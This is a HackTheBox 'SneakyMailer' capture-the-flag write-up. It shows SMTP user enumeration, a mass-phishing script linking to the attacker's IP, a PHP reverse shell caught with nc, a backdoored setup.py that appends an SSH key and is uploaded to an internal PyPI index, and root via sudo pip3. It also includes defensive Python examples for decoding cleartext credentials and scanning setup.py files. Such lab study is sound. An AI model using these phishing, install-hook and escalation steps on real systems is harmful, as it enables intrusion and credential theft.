SneakyMailer | HackTheBox Writeup

  • enumerating the web server on port 80 to collect a list of employee email addresses
  • verifying which of those addresses are valid with smtp-user-enum
  • sending every employee a mail containing a link to an attacker-controlled IP and catching the response
  • logging in to a mail client to read the victim's emails
  • logging in to the FTP server and uploading a PHP reverse shell
  • uploading a custom Python package with a payload in setup.py to the internal PyPI server
  • getting a root shell, since the user low on the box can run pip3 via sudo

PortScan

PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
143/tcp  open  imap
993/tcp  open  imaps
8080/tcp open  http-proxy

Port 80

10.10.10.197    sneakycorp.htb

Gobuster

$ gobuster dir -u http://sneakycorp.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
/index.php (Status: 200)
/img (Status: 301)
/css (Status: 301)
/team.php (Status: 200)
/js (Status: 301)
/vendor (Status: 301)
/pypi (Status: 301)
$ gobuster dir -u http://sneakycorp.htb/pypi/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
/register.php (Status: 200)

SMTP-Port 25

The first address was taken from the team.php page, i.e. <airisatou@sneakymailer.htb>, and it turns out to be valid: the server answers VRFY with 252 (it cannot verify the user but will accept mail for it), while an unknown local user gets 550 and an address in a foreign domain gets 454. That difference in reply codes is what lets an outsider confirm which mailboxes exist. The SMTP reply codes are defined in RFC 5321.
VRFY <airisatou@sneakymailer.htb>
252 2.0.0 <airisatou@sneakymailer.htb>
VRFY <thisemaildoesnotexists@email.com>
454 4.7.1 <thisemaildoesnotexists@email.com>: Relay access denied
VRFY <thisemaildoesnotexist@sneakymailer.htb>
550 5.1.1 <thisemaildoesnotexist@sneakymailer.htb>: Recipient address rejected: User unknown in virtual mailbox table

Using smtp-user-enum

$ smtp-user-enum -U email.txt 10.10.10.197 25
Connecting to 10.10.10.197 25 ...
220 debian ESMTP Postfix (Debian/GNU)
250 debian
Start enumerating users with VRFY mode ...
[----] <airisatou@sneakymailer.htb> 252 2.0.0 <airisatou@sneakymailer.htb>
[----] <angelicaramos@sneakymailer.htb> 252 2.0.0 <angelicaramos@sneakymailer.htb>
[----] <ashtoncox@sneakymailer.htb> 252 2.0.0 <ashtoncox@sneakymailer.htb>
[----] <bradleygreer@sneakymailer.htb> 252 2.0.0 <bradleygreer@sneakymailer.htb>
[----] <brendenwagner@sneakymailer.htb> 252 2.0.0 <brendenwagner@sneakymailer.htb>
[----] <briellewilliamson@sneakymailer.htb> 252 2.0.0

Sending Email using SMTP protocol

$ nc 10.10.10.197 25
220 debian ESMTP Postfix (Debian/GNU) #greeting banner
MAIL FROM:<this_email_doesnot_exist@email.com> #non-existent sender address
250 2.1.0 Ok
RCPT TO:<airisatou@sneakymailer.htb> #valid recipient
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
http://10.10.14.167/clickme #email content with my IP
.
250 2.0.0 Ok: queued as DE8202466A
Automating this for every pair of addresses (sendmail.sh):
#!/bin/bash
for sender in $(cat email) #email contains the list of addresses
do
  for rcv in $(cat email)
  do
    echo "mail from:$sender"
    echo "rcpt to:$rcv"
    echo "data"
    echo "Subject: Looking for a job"
    echo "http://10.10.14.167/clickme" #attacker's IP
    echo "."
  done
done
$ ./sendmail.sh | nc 10.10.10.197 25
$ sudo nc -nvklp 80
POST /clickme%0D HTTP/1.1
Host: 10.10.14.167
User-Agent: python-requests/2.23.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 185
Content-Type: application/x-www-form-urlencoded

firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt
  • Email: paulbyrd@sneakymailer.htb
  • Password: ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

FTP

$ ftp 10.10.10.197
Connected to 10.10.10.197.
220 (vsFTPd 3.0.3)
Name (10.10.10.197:root): paulbyrd
530 Permission denied.
Login failed.
ftp>

IMAP (PORT 143)

$ nc 10.10.10.197 143
* OK [CAPABILITY IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA IDLE ACL ACL2=UNION STARTTLS ENABLE UTF8=ACCEPT] Courier-IMAP ready. Copyright 1998-2018 Double Precision, Inc. See COPYING for distribution information.
A1 AUTHENTICATE LOGIN #initiating authentication
+ VXNlcm5hbWU6 #asking for email
cGF1bGJ5cmRAc25lYWt5bWFpbGVyLmh0Ygo= #email in b64 form
+ UGFzc3dvcmQ6 # asking for password
XigjSkBTa0Z2MlslS2hJeEtrKEp1YGhxY0hsPDpIdAo= #password in b64 form
A1 NO Login failed.
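Both credential captures in this write-up work because the protocols involved are cleartext: the victim's script POSTed the registration form over plain HTTP, and AUTHENTICATE LOGIN on port 143 only base64-encodes the username and password, which is encoding, not encryption. The Python example below is added here and is not part of the original write-up; it decodes constructed copies of the two captures (the POST body from the listener, with unrelated headers trimmed, and the two base64 lines typed into the IMAP session) to show exactly what anyone on the network path would recover. It also shows that the base64 strings typed into the IMAP session decode with a trailing newline, which is what `echo ... | base64` without `-n` produces, and which the server treats as part of the credential, so the hand-typed login fails. The request target `/clickme%0D` likewise decodes to `/clickme` followed by a carriage return, apparently the line ending copied along with the URL by the bot that fetched it.

```python
import base64
from urllib.parse import parse_qs, unquote

# Constructed copy of the POST that hit the attacker's listener (some headers trimmed).
CAPTURED_HTTP_REQUEST = (
    "POST /clickme%0D HTTP/1.1\r\n"
    "Host: 10.10.14.167\r\n"
    "User-Agent: python-requests/2.23.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 185\r\n"
    "\r\n"
    "firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb"
    "&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt"
    "&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt"
)

# Constructed copy of the two client lines sent during AUTHENTICATE LOGIN on port 143.
CAPTURED_IMAP_LOGIN_STEPS = [
    "cGF1bGJ5cmRAc25lYWt5bWFpbGVyLmh0Ygo=",
    "XigjSkBTa0Z2MlslS2hJeEtrKEp1YGhxY0hsPDpIdAo=",
]


def parse_http_form_post(raw):
    """Split a raw HTTP/1.1 request into method, decoded path and decoded form fields.

    parse_qs does the percent-decoding, so %25 becomes '%' and %60 becomes '`'.
    Only the first value of each field is kept.
    """
    head, _, body = raw.partition("\r\n\r\n")
    method, target, _version = head.split("\r\n")[0].split(" ")
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return {"method": method, "path": unquote(target), "fields": fields}


def credential_fields(fields):
    """Names of form fields that look like secrets, for quick triage of a capture."""
    return sorted(k for k in fields if "pass" in k.lower())


def decode_imap_login(steps):
    """Decode the two base64 lines a client sends for AUTHENTICATE LOGIN.

    A trailing newline typically means the strings came from `echo ... | base64`
    without -n; the server treats it as part of the credential and the login fails.
    """
    username, password = (base64.b64decode(s).decode() for s in steps)
    return {
        "username": username.rstrip("\n"),
        "password": password.rstrip("\n"),
        "stray_newline": username.endswith("\n") or password.endswith("\n"),
    }


if __name__ == "__main__":
    req = parse_http_form_post(CAPTURED_HTTP_REQUEST)
    print(req["method"], repr(req["path"]))
    print("secret fields:", credential_fields(req["fields"]))
    print("http form :", req["fields"]["email"], req["fields"]["password"])
    imap = decode_imap_login(CAPTURED_IMAP_LOGIN_STEPS)
    print("imap login:", imap["username"], imap["password"],
          "stray newline:", imap["stray_newline"])
```

The same decoding applies to any form POST or LOGIN exchange captured on the wire, which is the reason to serve the registration form only over HTTPS and to require STARTTLS on 143 (or use 993) before the LOGIN mechanism is offered.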
Reading the mailbox with a mail client instead:
$ apt install claws-mail

From: Paul Byrd <paulbyrd@sneakymailer.htb>
To: low@debian
Subject: Module testing
Date: Wed, 27 May 2020 13:28:58 -0400
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Thunderbird/68.8.0

Hello low
Your current task is to install, test and then erase every python module you
find in our PyPI service, let me know if you have any inconvenience.

From: Paul Byrd <paulbyrd@sneakymailer.htb>
To: root <root@debian>
Subject: Password reset
Date: Fri, 15 May 2020 13:03:37 -0500

Hello administrator, I want to change this password for the developer account
Username: developer
Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
Please notify me when you do it

FTP

$ ftp 10.10.10.197
Connected to 10.10.10.197.
220 (vsFTPd 3.0.3)
Name (10.10.10.197:root): developer
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ftp> dir -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 4096 Jun 23 08:15 .
drwxr-xr-x 3 0 0 4096 Jun 23 08:15 ..
drwxrwxr-x 8 0 1001 4096 Aug 12 06:17 dev
226 Directory send OK.
ftp>
ftp> cd dev
250 Directory successfully changed.
ftp> dir -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x 8 0 1001 4096 Aug 12 06:17 .
drwxr-xr-x 3 0 0 4096 Jun 23 08:15 ..
drwxr-xr-x 2 0 0 4096 May 26 19:52 css
drwxr-xr-x 2 0 0 4096 May 26 19:52 img
-rwxr-xr-x 1 0 0 13742 Jun 23 09:44 index.php
drwxr-xr-x 3 0 0 4096 May 26 19:52 js
drwxr-xr-x 2 0 0 4096 May 26 19:52 pypi
drwxr-xr-x 4 0 0 4096 May 26 19:52 scss
-rwxr-xr-x 1 0 0 26523 May 26 20:58 team.php
drwxr-xr-x 8 0 0 4096 May 26 19:52 vendor
226 Directory send OK.
ftp> put shell.php
local: shell.php remote: shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5494 bytes sent in 0.00 secs (20.7094 MB/s)
ftp>

GOBUSTER

$ gobuster vhost -u sneakycorp.htb -w /usr/share/wordlists/SecLists-master/Discovery/DNS/namelist.txt
Found: dev.sneakycorp.htb (Status: 200) [Size: 13742]
10.10.10.197    sneakycorp.htb dev.sneakycorp.htb
Catching the reverse shell from the uploaded shell.php:
$ nc -nvlp 9001
Listening on [0.0.0.0] (family 2, port 9001)
Listening on 0.0.0.0 9001
Connection received on 10.10.10.197 48272
Linux sneakymailer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux
07:30:02 up 1:32, 0 users, load average: 1.33, 1.15, 1.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Upgrading to a full TTY:
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@sneakymailer:/$
#Ctrl-Z to background the shell, then on the attacker's terminal:
$ stty raw -echo
$ fg
www-data@sneakymailer:/$ export TERM=xterm

PRIVILEGE ESCALATION

www-data@sneakymailer:~$ ls -la /var/www
total 24
drwxr-xr-x 6 root root 4096 May 14 18:25 .
drwxr-xr-x 12 root root 4096 May 14 13:09 ..
drwxr-xr-x 3 root root 4096 Jun 23 08:15 dev.sneakycorp.htb
drwxr-xr-x 2 root root 4096 May 14 13:12 html
drwxr-xr-x 4 root root 4096 May 15 14:29 pypi.sneakycorp.htb
drwxr-xr-x 8 root root 4096 Jun 23 09:48 sneakycorp.htb
10.10.10.197   sneakycorp.htb dev.sneakycorp.htb pypi.sneakycorp.htb
$ ss -lt
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 5 127.0.0.1:5000 0.0.0.0:*

PORT 8080

www-data@sneakymailer:~/pypi.sneakycorp.htb$ ls -la
total 20
drwxr-xr-x 4 root root 4096 May 15 14:29 .
drwxr-xr-x 6 root root 4096 May 14 18:25 ..
-rw-r--r-- 1 root root 43 May 15 14:29 .htpasswd
drwxrwx--- 2 root pypi-pkg 4096 Jun 30 02:24 packages
drwxr-xr-x 6 root pypi 4096 May 14 18:25 venv
www-data@sneakymailer:~/pypi.sneakycorp.htb$ cat .htpasswd
pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
$ hashcat -m 1600 hash /usr/share/wordlists/rockyou.txt
$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/:soufianeelhaoui
  1. Creating directories and files
$ mkdir test
$ cd test
$ mkdir package
$ touch setup.cfg; touch setup.py
$ touch README.md; touch package/__init__.py
  2. setup.py
from setuptools import setup

setup(
    name='package',
    packages=['package'],
    description='Hello world enterprise edition',
    version='0.1',
    url='http://github.com/example/linode_example',
    author='Linode',
    author_email='docs@linode.com',
    keywords=['pip', 'linode', 'example']
)
  3. setup.cfg
[metadata]
description-file = README.md
  4. package/__init__.py
def hello_world():
    print("hello world")
  5. ~/.pypirc (HOME is pointed at the working directory so the file is picked up from there)
$ export HOME=`pwd`
$ touch ~/.pypirc
$ cat ~/.pypirc
[distutils]
index-servers =
    pypi
    linode

[pypi]
username:
password:

[linode]
repository: http://pypi.sneakycorp.htb:8080
username: pypi
password: soufianeelhaoui
Serving pspy64 from the attacker machine and running it on the box to watch what happens after an upload:
$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
www-data@sneakymailer:/dev/shm$ wget 10.10.14.167:8000/pspy64
www-data@sneakymailer:/dev/shm$ chmod +x pspy64
www-data@sneakymailer:/dev/shm$ ./pspy64
Uploading the package to the internal index:
$ python setup.py sdist upload -r linode

PSPY

/bin/sh -c /usr/bin/tar -C /tmp/tmp19f4qjx_ -zxf /var/www/pypi.sneakycorp.htb/packages/package-0.1.tar.gz                        
/usr/bin/tar -C /tmp/tmp19f4qjx_ -zxf /var/www/pypi.sneakycorp.htb/packages/package-0.1.tar.gz
/home/low/venv/bin/python /opt/scripts/low/install-modules.py
/bin/sh -c /usr/bin/screen -d -m /opt/scripts/low/install-module.sh /tmp/tmp19f4qjx_/package-0.1/setup.py &
/usr/bin/screen -d -m /opt/scripts/low/install-module.sh /tmp/tmp19f4qjx_/package-0.1/setup.py
/bin/bash /opt/scripts/low/install-module.sh /tmp/tmp19f4qjx_/package-0.1/setup.py
/home/low/venv/bin/python /tmp/tmp19f4qjx_/package-0.1/setup.py install
/home/low/venv/bin/python /opt/scripts/low/install-modules.py
/home/low/venv/bin/python3 /home/low/venv/bin/pip uninstall package-0.1

Modifying setup.py to get a shell

$ ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): sneakymailer
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in sneakymailer.
Your public key has been saved in sneakymailer.pub.
The key fingerprint is:
SHA256:NBsCstqBuzXuIYk5OpEEdiR2LjxNLoJn6ljxBUG2v8c root@kali
The key's randomart image is:
+---[RSA 3072]----+
| oo=*. |
|=oB= + |
|*=B+. o + |
|.O++ o o + |
|=.= . . S |
|*B . o |
|Ooo . E |
|o+ . . |
|... |
+----[SHA256]-----+
from setuptools import setup
import os

try:
    os.system("echo 'ssh-rsa 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' >> ~/.ssh/authorized_keys")
except:
    pass

setup(
    name='package',
    packages=['package'],
    description='Hello world enterprise edition',
    version='0.1',
    url='http://github.com/example/linode_example',
    author='Linode',
    author_email='docs@linode.com',
    keywords=['pip', 'linode', 'example']
)
$ python setup.py sdist upload -r linode
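The modified setup.py works because `setup.py install` is arbitrary Python executed by whoever runs the install pipeline; pspy showed that here it is the user low, via /opt/scripts/low/install-module.sh, and the sudo rule at the end of the box lets the same thing happen as root through `pip3 install`. Someone operating a private index can at least triage uploads before that step runs. The Python example below is added here and is not part of the write-up or of any PyPI tooling: it statically inspects a setup.py with the `ast` module for calls that execute at install time (the list of flagged names is this example's own choice, not a standard one), reports whether `setup()` is handed custom command classes, and can open an sdist tarball of the layout seen in the pspy output (`package-0.1/setup.py`). The two sample setup.py sources and the in-memory tarball are constructed, with a harmless `echo` standing in for the payload.

```python
import ast
import io
import tarfile

# Calls that, when present in setup.py, run on the installing host with the installer's
# privileges. This set is the example's own choice; extend it to taste.
SIDE_EFFECT_CALLS = {
    "os.system", "os.popen", "os.execl", "os.execv",
    "subprocess.run", "subprocess.call", "subprocess.Popen", "subprocess.check_output",
    "exec", "eval", "open", "urllib.request.urlopen",
}


def _dotted_name(node):
    """Render `os.system` / `subprocess.Popen` / `exec` as a dotted string, else None."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted_name(node.value)
        return f"{base}.{node.attr}" if base else None
    return None


def inspect_setup_py(source):
    """Static report on a setup.py.

    Every node is visited, not only module level: code inside try blocks, functions
    and custom command classes all runs on `setup.py install` too.
    """
    tree = ast.parse(source)
    calls = []
    custom_commands = False
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted_name(node.func)
        if name in SIDE_EFFECT_CALLS:
            calls.append(name)
        if name == "setup" and any(kw.arg == "cmdclass" for kw in node.keywords):
            custom_commands = True
    return {"calls": calls, "custom_commands": custom_commands}


def scan_sdist(tar_bytes):
    """Locate <name>-<version>/setup.py inside an sdist tar.gz and inspect it."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            parts = member.name.split("/")
            if len(parts) == 2 and parts[1] == "setup.py" and member.isfile():
                source = tar.extractfile(member).read().decode()
                return inspect_setup_py(source)
    raise ValueError("no top-level setup.py in sdist")


def build_sdist_bytes(dist_dir, setup_source):
    """Constructed stand-in for `python setup.py sdist`: a tar.gz holding only setup.py."""
    buf = io.BytesIO()
    data = setup_source.encode()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo(name=f"{dist_dir}/setup.py")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed samples: the plain package from the write-up, and one with an install hook.
BENIGN_SETUP = """\
from setuptools import setup
setup(name='package', packages=['package'], version='0.1')
"""

HOOKED_SETUP = """\
from setuptools import setup
import os
try:
    os.system("echo constructed-side-effect")  # runs as whoever installs the package
except Exception:
    pass
setup(name='package', packages=['package'], version='0.1')
"""


if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP), ("hooked", HOOKED_SETUP)):
        print(label, inspect_setup_py(src))
    print("sdist", scan_sdist(build_sdist_bytes("package-0.1", HOOKED_SETUP)))
```

On the box itself the uploads land in /var/www/pypi.sneakycorp.htb/packages/, so `scan_sdist(open(".../package-0.1.tar.gz", "rb").read())` would flag the package before the install job picks it up. A static check of this kind is a triage aid, not a sandbox: obfuscated code or a cmdclass hook can still slip past it, and the real fix for this pipeline is to never execute an uploaded setup.py with a privileged account at all (install only wheels built and reviewed elsewhere), and never to expose `pip3 install` through a NOPASSWD sudo rule.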
$ ssh -i sneakymailer low@10.10.10.197
Linux sneakymailer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Tue Jun 9 03:02:52 2020 from 192.168.56.105
low@sneakymailer:~$
low@sneakymailer:~$ cat user.txt  | wc -c
33
low@sneakymailer:~$ sudo -l
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Matching Defaults entries for low on sneakymailer:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User low may run the following commands on sneakymailer:
(root) NOPASSWD: /usr/bin/pip3
low@sneakymailer:~$ TF=$(mktemp -d)
low@sneakymailer:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
low@sneakymailer:~$ sudo /usr/bin/pip3 install $TF
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Processing /tmp/tmp.cA7sEWkFJt
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt | wc -c
33

Shishir Subedi